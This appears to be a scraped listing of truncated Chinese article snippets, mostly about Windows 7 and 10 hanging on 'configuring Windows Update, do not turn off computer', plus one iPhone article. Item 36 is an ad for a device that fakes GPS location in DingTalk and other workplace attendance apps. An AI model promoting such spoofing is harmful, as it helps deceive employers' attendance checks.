    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57